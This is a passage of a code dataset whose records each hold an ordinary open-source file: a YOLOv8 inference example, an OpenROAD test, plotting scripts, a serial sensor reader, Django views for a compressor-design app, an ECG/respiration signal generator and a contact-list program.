< 2:\n print(\"Error: Image URL or path not provided.\")\n sys.exit(1)\n\n img_path = sys.argv[1]\n yolo_variant = sys.argv[2] if len(sys.argv) >= 3 else (print(\"No variant given, so choosing 'n' as the default. Yolov8 has different variants, you can choose from ['n', 's', 'm', 'l', 'x']\") or 'n')\n print(f'running inference for YOLO version {yolo_variant}')\n\n output_folder_path = Path('./outputs_yolov8')\n output_folder_path.mkdir(parents=True, exist_ok=True)\n #absolute image path or URL\n image_location = [np.frombuffer(fetch(img_path).read_bytes(), np.uint8)]\n image = [cv2.imdecode(image_location[0], 1)]\n out_paths = [(output_folder_path / f\"{Path(img_path).stem}_output{Path(img_path).suffix}\").as_posix()]\n if not isinstance(image[0], np.ndarray):\n print('Error in image loading. Check your image file.')\n sys.exit(1)\n pre_processed_image = preprocess(image)\n\n # Different YOLOv8 variants use different w , r, and d multiples. 
For a list , refer to this yaml file (the scales section) https://github.com/ultralytics/ultralytics/blob/main/ultralytics/models/v8/yolov8.yaml\n depth, width, ratio = get_variant_multiples(yolo_variant)\n yolo_infer = YOLOv8(w=width, r=ratio, d=depth, num_classes=80)\n\n state_dict = safe_load(fetch(f'https://gitlab.com/r3sist/yolov8_weights/-/raw/master/yolov8{yolo_variant}.safetensors'))\n load_state_dict(yolo_infer, state_dict)\n\n st = time.time()\n predictions = yolo_infer(pre_processed_image)\n print(f'did inference in {int(round(((time.time() - st) * 1000)))}ms')\n\n post_predictions = postprocess(preds=predictions, img=pre_processed_image, orig_imgs=image)\n\n #v8 and v3 have same 80 class names for Object Detection\n class_labels = fetch('https://raw.githubusercontent.com/pjreddie/darknet/master/data/coco.names').read_text().split(\"\\n\")\n\n draw_bounding_boxes_and_save(orig_img_paths=image_location, output_img_paths=out_paths, all_predictions=post_predictions, class_labels=class_labels)\n\n# TODO for later:\n# 1. Fix SPPF minor difference due to maxpool\n# 2. AST exp overflow warning while on cpu\n# 3. Make NMS faster\n# 4. Add video inference and webcam support","repo_name":"tinygrad/tinygrad","sub_path":"examples/yolov8.py","file_name":"yolov8.py","file_ext":"py","file_size_in_byte":19265,"program_lang":"python","lang":"en","doc_type":"code","stars":20676,"dataset":"github-code","pt":"61"} +{"seq_id":"18045108007","text":"from openroad import Design, Tech\nimport helpers\nimport rcx_aux\n\ntech = Tech()\ntech.readLef(\"sky130hs/sky130hs.tlef\")\ndesign = Design(tech)\n\nrcx_aux.bench_wires(len=100, all=True)\n\ndef_file = helpers.make_result_file(\"generate_pattern.def\")\n\nverilog_file = helpers.make_result_file(\"generate_pattern.v\")\n\nrcx_aux.bench_verilog(filename=verilog_file)\n\ndesign.writeDef(def_file)\n\nhelpers.diff_files(\"generate_pattern.defok\", def_file)\nhelpers.diff_files(\"generate_pattern.vok\", verilog_file)\n","repo_name":"The-OpenROAD-Project/OpenROAD","sub_path":"src/rcx/test/generate_pattern.py","file_name":"generate_pattern.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1027,"dataset":"github-code","pt":"61"} +{"seq_id":"2910990412","text":"import plotly.io as pio\n\nimport hydra\nfrom omegaconf import OmegaConf\n\nimport logging\nimport os\nimport sys\nimport glob\n# from natsort import natsorted\nimport numpy as np\nimport torch\nfrom collections import defaultdict\n\n# add cwd to path to allow running directly from the repo top level directory\nsys.path.append(os.getcwd())\nlog = logging.getLogger(__name__)\n\nfrom learn.utils.plotly import generate_errorbar_traces, plot_rewards_over_trials, hv_characterization, plot_sweep_1, plot_rollout_dat\n\n\n######################################################################\n@hydra.main(config_path='conf/plotting.yaml')\ndef plot(cfg):\n log.info(\"============= Configuration =============\")\n log.info(f\"Config:\\n{cfg.pretty()}\")\n log.info(\"=========================================\")\n hv_characterization()\n quit()\n # Yaw control\n yaw_dir = \"/Users/nato/Documents/Berkeley/Research/Codebases/dynamics-learn/sweeps/2020-05-13/08-01-09/metric.name=Yaw,robot=iono_sim/\"\n ex = \"0/trial_33.dat\"\n yaw_ex = yaw_dir+ex\n # plot_sweep_1(yaw_dir)\n plot_rollout_dat(yaw_ex)\n quit()\n # dir=2020-02-10/15-39-36\n files = glob.glob(hydra.utils.get_original_cwd() + '/outputs/' + cfg.dir + '/*/**.dat')\n ms = []\n cl = []\n for g in files:\n 
mse, clust = torch.load(g)\n if clust < 500:\n continue\n ms.append(mse)\n cl.append(clust)\n\n # ms = np.array(ms)\n # cl = np.array(cl)\n\n # Non clustered data\n full_size = [4000]\n base = [0.6844194601919266,\n 0.6426670856359498,\n 0.6760970001662061,\n 0.7867345088097977,\n 0.6402819700817463,\n 0.6432612884414582,\n 0.614643476721318,\n 0.673518857099874,\n 0.5565854257191823,\n 0.9437187183401807]\n #\n # for b in base:\n # ms.append(b)\n # cl.append(full_size[0])\n\n cl, ms = zip(*sorted(zip(cl, ms)))\n ids = np.unique(cl)\n\n cl_arr = np.stack(cl).reshape((len(ids), -1))\n ms_arr = np.stack(ms).reshape((len(ids), -1))\n\n import matplotlib.pyplot as plt\n import plotly.graph_objects as go\n\n colors = plt.get_cmap('tab10').colors\n traces = []\n i = 1\n cs_str = 'rgb' + str(colors[i])\n\n err_traces, xs, ys = generate_errorbar_traces(ms_arr.T, xs=cl_arr.T.tolist(), color=cs_str,\n name=f\"Clustered Training\")\n for t in err_traces:\n traces.append(t)\n\n layout = dict( #title=f\"Test Set Prediction Error\", # (Env: {env_name})\",\n xaxis={'title': 'Cluster Size (Log Scale)',\n 'autorange': 'reversed',\n 'range':[3.7, 2.6]\n },\n yaxis={'title': 'Prediction Mean Squared Error',\n 'range':[.3,1]},\n font=dict(family='Times New Roman', size=33, color='#7f7f7f'),\n xaxis_type=\"log\",\n # yaxis_type=\"log\",\n height=600,\n width=1300,\n margin=dict(l=0, r=0, b=0, t=0),\n plot_bgcolor='white',\n legend={'x': .6, 'y': .05, 'bgcolor': 'rgba(50, 50, 50, .03)'})\n\n\n fig = go.Figure(\n data=traces,\n layout=layout,\n )\n\n fig.add_trace(\n # Line Horizontal\n go.Scatter(\n mode=\"lines\",\n x=[max(ids), min(ids)],\n y=[np.mean(base), np.mean(base)],\n line=dict(\n color=\"gray\",\n width=4,\n dash=\"dashdot\",\n ),\n name='Default Training (4000 Datapoints)'\n ))\n\n import plotly.io as pio\n pio.show(fig)\n fig.write_image('clustering_thin.pdf')\n quit()\n hv_characterization()\n\n ######################################################################\n logs = defaultdict(list)\n configs = defaultdict(list)\n logs_dirs = ['/Users/nol/Documents/code-bases/dynamicslearn/multirun/2019-12-16/20-01-04/', ]\n\n def load_log(directory, trial_file=None):\n if '.hydra' in os.listdir(directory):\n full_conf = OmegaConf.load(f\"{directory}/.hydra/config.yaml\")\n else:\n full_conf = OmegaConf.load(f\"{directory}/config.yaml\")\n trial_files = glob.glob(f\"{directory}/trial_*.dat\")\n if len(trial_files) > 1:\n if trial_file is not None:\n last_trial_log = f\"{directory}/{trial_file}\"\n else:\n last_trial_log = max(trial_files, key=os.path.getctime)\n vis_log = torch.load(last_trial_log)\n logs[log_dir].append(vis_log)\n configs[log_dir].append(full_conf)\n\n for log_dir in logs_dirs:\n if os.path.exists(os.path.join(log_dir, 'config.yaml')):\n log.info(f\"Loading latest trial from {log_dir}\")\n d = os.path.join(log_dir)\n load_log(d)\n else:\n # Assuming directory with multiple identical experiments (dir/0, dir/1 ..)\n latest = defaultdict(list)\n for ld in os.listdir(log_dir):\n directory = os.path.join(log_dir, ld)\n if os.path.isdir(directory):\n trial_files = glob.glob(f\"{directory}/trial_*.dat\")\n if len(trial_files) == 0:\n continue\n last_trial_log = max(trial_files, key=os.path.getctime)\n last_trial_log = last_trial_log[len(directory) + 1:]\n latest[log_dir].append(last_trial_log)\n\n for ld in os.listdir(log_dir):\n if ld == '.slurm': continue\n log_subdir = os.path.join(log_dir, ld)\n if os.path.isdir(log_subdir):\n # Load data for the smallest trial number from all sub 
directories\n if len(latest[log_dir]) == 0:\n log.warn(f\"No trial files found under {log_dir}\")\n break\n trial_file = natsorted(latest[log_dir])[0]\n load_log(log_subdir, trial_file)\n\n # To display the figure defined by this dict, use the low-level plotly.io.show function\n plot_rewards_over_trials(logs)\n\n\nif __name__ == '__main__':\n sys.exit(plot())\n","repo_name":"natolambert/dynamicslearn","sub_path":"learn/plot_plotly.py","file_name":"plot_plotly.py","file_ext":"py","file_size_in_byte":6278,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"61"} +{"seq_id":"30097765931","text":"import numpy as np\nimport scipy\nfrom serial import *\nfrom io import RawIOBase\n\nfrom serial import tools\nfrom serial.tools import list_ports\nfrom serial.tools.list_ports_common import ListPortInfo\nfrom serial import serialwin32 as serial\n\nser = tools.list_ports.comports();\n\n# serbase = serial.serialutil.SerialBase('COM8')\nser = serial.Serial('COM8')\n# ser.open()\n\ncal = [62.0,59.67,57.5,59.33,54.67,56.67,54.33,61.0,64.67,60.33,56.67,53.0,55.67,51.0,62.0,56.33,60.33,61.67,66.0,56.67,55.0,55.33,62.67,60.33,61.67,61.0,57.67,62.67,55.67,60.0,64.0,63.33,59.33,63.0,62.67,61.0,56.0,54.5,59.67,70.0]\n\ndef read_line():\n\tline = ''\n\twhile(ser.in_waiting > 0):\n\t\tresp = ser.read()\n\t\tline += resp.decode()\n\treturn line\n\ndef calibrate(line, cal):\n\tline_list = line.split(\",\")[0:-1]\n\tline_list = np.array([float(i) for i in line_list])\n\n\tfor i in range(len(line_list)):\n\t\tline_list[i] = line_list[i] - cal[i]\n\t\tif line_list[i] < 0:\n\t\t\tline_list[i] = 0\n\n\tline_list = np.array([str(i) for i in line_list])\n\tcomma = ','\n\tp_line = comma.join(line_list)\n\treturn p_line\n\ndef process_line(line, cal):\n\tline = calibrate(line, cal)\n\tline_list = line.split(\",\")[0:-1]\n\tline_list = np.array([float(i) for i in line_list])\n\tline_list = avg_filt(line_list)\n\tthresh = np.mean(line_list);\n\t\n\tline_list = line_list>thresh\n\tline_list = line_list.astype(np.int)\n\n\tline_list = np.array([str(i) for i in line_list])\n\tcomma = ''\n\tp_line = comma.join(line_list)\n\tp_line += '\\n\\r'\n\treturn p_line\n\ndef avg_filt(x):\n\tavg = x[0:len(x)-2] + x[1:len(x)-1] + x[2:len(x)]\n\tavg_com = [x[0]] + avg.tolist() + [x[-1]]\n\treturn avg_com\n\nf = open(\"./image.txt\", \"w+\")\nf.close()\n\nwhile(1):\n\tif (ser.in_waiting > 0):\n\t\tline = read_line()\n\t\tp_line = process_line(line, cal)\n\t\tprint(p_line)\n\t\tf = open(\"./image.txt\", \"a+\")\n\t\tf.write(p_line)\n\t\tf.close()\n\n","repo_name":"mchoun95/6.s063_Scanner","sub_path":"contact_image_sensor/Wifi/Serial.py","file_name":"Serial.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36090222564","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n# Open PNG file\r\nfrom PIL import Image\r\n# Load matlab's file\r\nimport scipy.io\r\n\r\nfrom initializeCentroids import initialize_centroids\r\nfrom KmeansAlgo import kmeans_algo\r\nfrom findClosestCentroids import find_closest_centroid\r\n\r\n\r\n# Purpose: we'll use K-means algo to select 16 colors that will be used to represent the compressed image.\r\n# Concretely, we treat every pixel of original image as a data example AND use K-means algo to find 16 colors that are\r\n# the most appropriate cluster (group) of pixel in 3D RGB space. 
Once we have computed the trained cluster centroids\r\n# on the image, we use these 16 colors to replace colors in image (Means compress image to only 16 colors)\r\n\r\n# Load image & show PNG image\r\nfname = \"data/bird_small.png\"\r\nplt.imshow(Image.open(fname))\r\nplt.axis(\"off\")\r\nplt.show()\r\n\r\n# Load image array file of \"bird_small.png\"\r\nbird_mat = scipy.io.loadmat(\"data/bird_small.mat\")\r\nA = bird_mat[\"A\"]\r\n\r\n# Scaling and Reducing dimension to 2D array\r\nA = np.divide(A, 255) # Result between 0-1\r\nA = np.reshape(A, (A.shape[0]*A.shape[1], A.shape[2]))\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n############# Run K-mean to compress colors of image to 16 colors #############\r\nprint(\"Run K-means clustering algo with K = 16 \")\r\n# Set Initial parameters\r\nK = 16\r\nmax_iter = 10\r\ninitial_centroids = initialize_centroids(A, K)\r\n\r\n# Fitting Data to K-means model -> trained centroids\r\ncentroids, _ = kmeans_algo(A, initial_centroids, max_iter, False) # (K, A.shape[1])\r\n\r\n# Apply K-mean model to compress image\r\n# \"idx\": index of each color closet to each data example\r\nidx = find_closest_centroid(A, centroids)\r\nidx = idx.astype(int) # (A.shape[0], 1)\r\n\r\n# Recover image with only 16 colors\r\nA_recover = np.zeros((A.shape[0], A.shape[1]))\r\n# Apply closest color to each data example\r\nfor k in range(A_recover.shape[0]):\r\n A_recover[k, :] = centroids[idx[k]-1, :]\r\n# Reshape recover array to an image array (3D arr)\r\nA_recovered = A_recover.reshape((bird_mat[\"A\"].shape[0], bird_mat[\"A\"].shape[1], bird_mat[\"A\"].shape[2]))\r\n\r\n# Plotting original image and recovered image for comparing\r\nplt.subplot(2, 1, 1)\r\nplt.axis(\"off\")\r\nplt.title(\"Original\")\r\nplt.imshow(Image.open(fname))\r\n\r\nplt.subplot(2, 1, 2)\r\nplt.title(\"Recover\")\r\nplt.axis(\"off\")\r\nplt.imshow(A_recovered)\r\nplt.show()\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n############## K-means with multiple value of K ###############\r\nprint(\"\\nRun K-means clustering algorithm with multiple value of K\")\r\n# Data input \"A\" is already pre-precessed above\r\nK_vals = [2, 8, 16, 24, 32]\r\nmax_iter = 10\r\n\r\n# Run K-means algo to different value of K\r\nimg_compressed = []\r\nfor iK, K in enumerate(K_vals):\r\n print(f\"\\nRun K-mean algo with K = {K}\")\r\n\r\n # Run K-means algo\r\n initial_centroids = initialize_centroids(A, K)\r\n centroids, _ = kmeans_algo(A, initial_centroids, max_iter, False)\r\n # Image compression\r\n idx = find_closest_centroid(A, centroids)\r\n idx = idx.astype(int)\r\n # Recover the image with K colors\r\n A_recover = np.zeros((A.shape[0], A.shape[1]))\r\n for k in range(A_recover.shape[0]):\r\n A_recover[k, :] = centroids[idx[k]-1, :]\r\n A_recovered = A_recover.reshape((bird_mat[\"A\"].shape[0], bird_mat[\"A\"].shape[1], bird_mat[\"A\"].shape[2]))\r\n # Add recovered image to list\r\n img_compressed.append(A_recovered)\r\n\r\ninput(\"Pause program, Press enter to continue\")\r\n\r\n\r\n# Multiple plot for different recovered images\r\nfig = plt.figure(figsize=(7, 9))\r\nnrows = 3\r\nncols = 2\r\nax = fig.add_subplot(nrows, ncols, 1)\r\nax.axis(\"off\")\r\nax.set_title(\"Original\")\r\nax.imshow(bird_mat[\"A\"])\r\n\r\nfor i in range(len(img_compressed)):\r\n ax = fig.add_subplot(nrows, ncols, i+2)\r\n ax.imshow(img_compressed[i])\r\n ax.axis(\"off\")\r\n ax.set_title(f\"K = 
{K_vals[i]}\")\r\nplt.show()\r\n\r\n","repo_name":"HarryPham0123/Coursera_Machine_learning_AndrewNg","sub_path":"(Ex7)_Unsupervised_learning_AND_PCA_algorithm/main_ImageCompressWithKmeans.py","file_name":"main_ImageCompressWithKmeans.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73373150275","text":"import asyncio\nfrom typing import List\n\n\nasync def produce_work(\n batch: List[dict],\n work_queue: asyncio.Queue,\n producer_completed: asyncio.Event):\n for data in batch:\n await work_queue.put(data)\n producer_completed.set()\n","repo_name":"FShamasneh/advanced_python","sub_path":"async/producer.py","file_name":"producer.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13552267322","text":"from django.shortcuts import render, redirect\nfrom django.template.loader import render_to_string\nimport django.template\nfrom . import forms\nfrom . import models\nimport django.http\nimport django.views.generic\nimport django.utils.timezone\nimport django.db.utils\nimport django.db\nfrom django.core.urlresolvers import reverse\nfrom .data_extraction import DebugCompressorHandler\nfrom django.views.decorators.cache import never_cache\nimport time\nfrom django.contrib import auth\nfrom django.utils.decorators import method_decorator\nfrom django.contrib.auth.decorators import login_required\nimport django.core.exceptions\nimport json\nimport ast\nfrom enum import Enum\nimport re\nfrom . import compressor_engine_handle\nimport logging\nfrom .compressor_engine import engine_logging\nimport traceback\nimport pdb\n\n\nclass FORM_CLASS(Enum):\n main = forms.MainParametersForm\n mean_radius = forms.MeanRadiusParametersForm\n profiling = forms.ProfilingParametersForm\n\n\nclass MODEL_CLASS(Enum):\n main = models.MainDataPart\n mean_radius = models.MeanRadiusDataPart\n profiling = models.ProfilingDataPart\n\n\nclass AuthMixin:\n def get_response(self, request):\n if request.user.is_authenticated():\n return self.render_registered_template(request)\n else:\n return self.render_unregister_template(request)\n\n def render_registered_template(self, request):\n pass\n\n def render_unregister_template(self, request):\n pass\n\n\nclass GetMainPage(django.views.generic.TemplateView):\n template_name = 'gas_dynamics/main_page.html'\n\n\nclass Login(django.views.generic.View):\n\n def get(self, request):\n if 'auth_fail' in request.session:\n auth_fail = True\n else:\n auth_fail = False\n context = {\n 'auth_fail': auth_fail,\n }\n\n return render(request, 'gas_dynamics/login.html', context)\n\n def post(self, request):\n username = request.POST['username']\n password = request.POST['password']\n\n print(username, password)\n\n user = auth.authenticate(username=username, password=password)\n\n if user is not None:\n if user.is_active:\n auth.login(request, user)\n return redirect('gas_dynamics:main_page')\n else:\n pass\n else:\n request.session['auth_fail'] = True\n return redirect('gas_dynamics:login')\n\n\nclass Logout(django.views.generic.View):\n def get(self, request):\n auth.logout(request)\n return redirect('gas_dynamics:main_page')\n\n\nclass ProjectList(django.views.generic.ListView):\n model = models.Project\n context_object_name = 'projects'\n template_name = 'gas_dynamics/project_list/projects_list.html'\n\n @method_decorator(login_required)\n def dispatch(self, request, *args, **kwargs):\n 
return super(ProjectList, self).dispatch(request, *args, **kwargs)\n\n def get_query_set(self):\n return models.Project.objects.all()\n\n\nclass DeleteProject(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username, project_name):\n if request.is_ajax():\n project_name = request.POST['project_name']\n projects = self.model.objects.filter(name=project_name)\n\n for project in projects:\n project.delete()\n\n context = {\n 'projects': models.Project.objects.all(),\n }\n return render(request, 'gas_dynamics/project_list/projects_body.html', context)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass AddProject(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username):\n if request.is_ajax():\n project_form = forms.AddProjectForm(request.POST)\n\n error_message = ''\n if project_form.is_valid():\n try:\n project = self.model.objects.create(user=request.user, name=project_form.cleaned_data['name'])\n project.save()\n except django.db.IntegrityError as e:\n error_message += 'This project already exists.\\n'\n else:\n error_message += 'Invalid project name.\\n'\n\n context = {\n 'projects': models.Project.objects.all(),\n }\n\n request_context = django.template.RequestContext(request)\n html_content = render_to_string('gas_dynamics/project_list/projects_body.html', context, request_context)\n\n return django.http.JsonResponse({\n 'html_content': html_content,\n 'errors': error_message\n })\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass ProjectTasks(django.views.generic.View):\n template_name = 'gas_dynamics/project_content/task_container_template.html'\n\n def get(self, request, username, project_name):\n project = models.Project.objects.get(name=project_name)\n tasks = models.Task.objects.filter(project=project)\n\n print('Here', models.Task.objects.all(), '\\n\\n\\n')\n\n context = {\n 'project': project,\n 'tasks': tasks\n }\n\n return render(request, self.template_name, context=context)\n\n\nclass AddTask(django.views.generic.View):\n model = models.Project\n\n def post(self, request, username, project_name):\n if request.is_ajax():\n task_form = forms.AddTaskForm(request.POST)\n\n error_message = ''\n if task_form.is_valid():\n user = request.user\n project = models.Project.objects.get(user=user, name=project_name)\n task_name = task_form.cleaned_data['name']\n\n try:\n self._create_task(project, task_name)\n except django.db.IntegrityError as e:\n error_message += str(e)\n else:\n error_message += 'Invalid task name.\\n'\n\n if not error_message:\n context = {\n 'tasks': models.Task.objects.filter(project=project),\n 'project': project\n }\n else:\n context = {}\n\n request_context = django.template.RequestContext(request)\n html_content = render_to_string('gas_dynamics/project_content/task_container.html', context, request_context)\n\n return django.http.JsonResponse({\n 'html_content': html_content,\n 'errors': error_message\n })\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n def _create_task(self, project, task_name):\n task = models.Task.objects.create(project=project, name=task_name)\n task.save()\n\n\nclass UpdateTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n task_dict = 
json.loads(request.POST['data'])\n\n self._reset_task_kind(task)\n process_results = dict()\n for form_type in task_dict:\n data = {\n 'user': user,\n 'project': project,\n 'task': task,\n 'content': json.loads(task_dict[form_type])\n }\n\n process_results[form_type] = self._process_wrapper(request, task, data, form_type)\n\n return django.http.JsonResponse(process_results)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n def _process_wrapper(self, request, task, data, form_type):\n form_class = FORM_CLASS[form_type].value\n model_class = MODEL_CLASS[form_type].value\n return self._process_form_data(request, task, data, form_class, model_class)\n\n def _process_form_data(self, request, task, data, form_class, model_class):\n form = form_class(data['content'])\n result = dict()\n\n if form.is_valid():\n model, is_created = model_class.objects.get_or_create(task=data['task'], defaults=form.cleaned_data)\n\n for key in form.cleaned_data:\n setattr(model, key, form.cleaned_data[key])\n\n model.save()\n self._set_task_kind(task, model.get_task_kind())\n\n result['messages'] = 'Data block saved'\n result['errors'] = ''\n else:\n result['messages'] = 'Data block not saved'\n result['errors'] = form.errors\n\n return result\n\n @classmethod\n def _set_task_kind(cls, task, new_kind):\n priority = {\n models.Task.TASK_KIND.multi: 10,\n models.Task.TASK_KIND.single: 0,\n models.Task.TASK_KIND.unset: -10,\n }\n\n if priority[new_kind] > priority[task.kind]:\n task.kind = new_kind\n task.save()\n\n @classmethod\n def _reset_task_kind(cls, task):\n task.kind = models.Task.TASK_KIND.unset\n task.save()\n\n\n\n\nclass SolveTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n calc_type = request.POST['calc_type']\n\n try:\n solver = compressor_engine_handle.CompressorSolver(task)\n result_msg = self._calculate(solver, calc_type)\n except compressor_engine_handle.OperationFailedError as e:\n return django.http.HttpResponse('Task was not solved. %s' % (str(e),))\n\n\n return django.http.HttpResponse(result_msg)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n @classmethod\n def _get_solver_funcs(cls, key):\n def get_func_pair(call_func, analyzer):\n return (call_func, analyzer)\n\n if key == 'mean_radius':\n def call_func(solver):\n return solver.calculate_mean_radius()\n\n def analyzer(result):\n if result:\n return 'Mean radius calculation successfully finished'\n else:\n return 'Mean radius calculation failed'\n\n return get_func_pair(call_func, analyzer)\n\n elif key == 'profiling':\n\n def call_func(solver):\n return solver.do_profiling()\n\n def analyzer(result):\n if result:\n return 'Profiling successfully finished'\n else:\n return 'Profiling failed'\n\n return get_func_pair(call_func, analyzer)\n\n elif key == 'both':\n\n def call_func(solver):\n return [method() for method in (solver.calculate_mean_radius, solver.do_profiling)]\n\n def analyzer(result):\n if result[0] and result[1]:\n return 'Both successfully finished'\n elif result[0] and not result[1]:\n return 'Mean radius calculation successfully finished. 
Profiling failed'\n else:\n return 'Both failed'\n\n return get_func_pair(call_func, analyzer)\n\n else:\n raise RuntimeError('Invalid key')\n\n @classmethod\n def _calculate(cls, solver, calc_type):\n call_func, analyzer = cls._get_solver_funcs(calc_type)\n\n result_flags = call_func(solver)\n return analyzer(result_flags)\n\n\nclass DeleteTask(django.views.generic.View):\n def post(self, request, username, project_name, task_name):\n if request.is_ajax():\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n task.delete()\n\n template = 'gas_dynamics/project_content/task_container.html'\n context = {\n 'tasks': models.Task.objects.filter(project=project),\n 'project': project\n }\n return render(request, template, context)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\nclass GetValue(django.views.generic.View):\n\n def get(self, request, username, project_name, task_name):\n data = json.loads(request.GET['data'])\n\n return self.request_dispatcher(username, project_name, task_name, data)\n\n def request_dispatcher(self, username, project_name, task_name, data):\n if data['request_type'] == 'get_field_value':\n return self._get_field_value(username, project_name, task_name, data['request_content'])\n else:\n raise RuntimeError('Invalid request type. request_type: %(req_type)s. get_field_value required' %\n {'req_type': data['request_type']})\n\n def _get_field_value(self, username, project_name, task_name, data):\n user = models.User.objects.get(username=username)\n project = models.Project.objects.get(user=user, name=project_name)\n task = models.Task.objects.get(project=project, name=task_name)\n form_type = data['form_type']\n field_name = data['field_name']\n\n return self._get_model_value(task, form_type, field_name)\n\n def _get_model_value(self, task, form_type, field_name):\n model_class = MODEL_CLASS[form_type].value\n\n try:\n model = model_class.objects.get(task=task)\n except django.core.exceptions.ObjectDoesNotExist as e:\n return django.http.HttpResponse('')\n\n regex = re.compile('.*__[0-9]+$')\n if regex.match(field_name):\n field_name, index = field_name.split('__')\n index = int(index)\n\n value_list_str = getattr(model, field_name)\n\n if not value_list_str:\n return django.http.HttpResponse('')\n\n value_list = getattr(model, field_name)\n try:\n result_value = value_list[index]\n except IndexError:\n result_value = ''\n\n return django.http.HttpResponse(result_value)\n else:\n return django.http.HttpResponse(getattr(model, field_name))\n\n\n\n\n\n@never_cache\ndef get_plot(request):\n if request.is_ajax():\n data = {\n 'stage_number': range(4),\n 'lattice_type': ['rotor', 'stator'],\n 'render_image_url': request.build_absolute_uri(reverse('gas_dynamics:render_plot'))\n }\n return render(request, 'gas_dynamics/plot_holder.html', data)\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\ndef render_plot(request):\n if request.is_ajax():\n if request.method == 'POST':\n form = forms.GetPlotForm(request.POST)\n\n if form.is_valid():\n cleaned_data = form.cleaned_data\n\n compressor_handler = DebugCompressorHandler()\n\n plot_path = compressor_handler.get_profile_plot(cleaned_data['stage_num'],\n cleaned_data['lattice_type'],\n cleaned_data['h_rel'],\n cleaned_data['plot_name'],\n time.time())\n return django.http.JsonResponse({'plot_path': plot_path})\n\n else:\n 
django.http.UnreadablePostError()\n else:\n raise django.http.BadHeaderError('POST method is required')\n else:\n raise django.http.BadHeaderError('This the AJAX only url')\n\n\ndef plot_page(request):\n return render(request, 'gas_dynamics/plot_page.html', {\n 'plot_uri': request.build_absolute_uri(reverse('gas_dynamics:get_plot'))\n })\n","repo_name":"Sovianum/compressors-site","sub_path":"gas_dynamics/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42278855269","text":"import neurokit2 as nk\nimport numpy as np\nimport time\nimport pandas as pd\nimport serial\n\n\nclass Signal:\n ti = np.array((-70, -15, 0, 15, 100))\n ai = np.array((1.2, -5, 30, -7.5, 0.75))\n bi = np.array((0.25, 0.1, 0.1, 0.1, 0.4))\n ti = np.random.normal(ti, np.ones(5) * 3)\n ai = np.random.normal(ai, np.abs(ai / 5))\n bi = np.random.normal(bi, np.abs(bi / 5))\n\n ecg_signal = np.zeros(600)\n ecg_data = nk.ecg_simulate(duration=30)[::5]\n rsp_data= nk.rsp_simulate(duration=30,respiratory_rate=30)[::5]\n rsp_signal=np.zeros(600)\n real_time_signal=np.zeros(600)\n counter = 0\n\n\n def getSignal(type):\n Signal.generate_ecg()\n Signal.generate_rsp()\n Signal.get_realtime()\n\n if type == 1 :\n return Signal.real_time_signal\n elif type==2:\n return Signal.ecg_signal\n else:\n return Signal.rsp_signal\n \n\n def generate_ecg():\n Signal.ecg_signal = np.append(\n Signal.ecg_signal[5:], Signal.ecg_data[:5])\n Signal.ecg_data = np.append(\n Signal.ecg_data[5:], Signal.ecg_data[:5])\n\n \n def generate_rsp():\n Signal.rsp_signal = np.append(\n Signal.rsp_signal[5:], Signal.rsp_data[:5])\n Signal.rsp_data = np.append(\n Signal.rsp_data[5:], Signal.rsp_data[:5])\n\n\n def get_realtime():\n arduino = serial.Serial(port='COM3', baudrate=115200)\n reads=[]\n for i in range(5):\n while True:\n counter=0\n dataBarCode = arduino.readline()\n if len(dataBarCode) >= 1 and counter<=5:\n try:\n number= int(dataBarCode.decode(\"utf-8\"))\n reads.append(number)\n break\n except:\n continue\n arduino.close()\n \n Signal.real_time_signal = np.append(\n Signal.real_time_signal[5:], np.array(reads))\n\n","repo_name":"KamelMoohamed/Multi-signal-Monitor","sub_path":"signal_generator.py","file_name":"signal_generator.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72342127875","text":"#!/usr/bin/env python3.6\nfrom contact import Contact\n\ndef create_contact(fname,lname,phone,email):\n '''\n function to create a new contact\n '''\n\n new_contact = Contact(fname,lname,phone,email)\n return new_contact\n\ndef save_contact(contact):\n '''\n function to save contact that has been created\n '''\n\n contact.save_contact()\n\ndef del_contact(contact):\n '''\n function to delete contact that has been created\n '''\n\n contact.delete_contact()\n\ndef find_contact(number):\n '''\n function to find contact object based on phone number\n '''\n\n return Contact.find_by_number(number)\n\ndef check_existing_contacts(number):\n '''\n function that checks if a contact exists and returns a boolean value\n '''\n\n return Contact.contact_exists(number)\n\ndef display_contacts():\n '''\n function that returns all saved contacts\n '''\n\n return Contact.display_contacts()\n\ndef main():\n user_name = input(\"Hello, welcome to your contact list. What is your name? 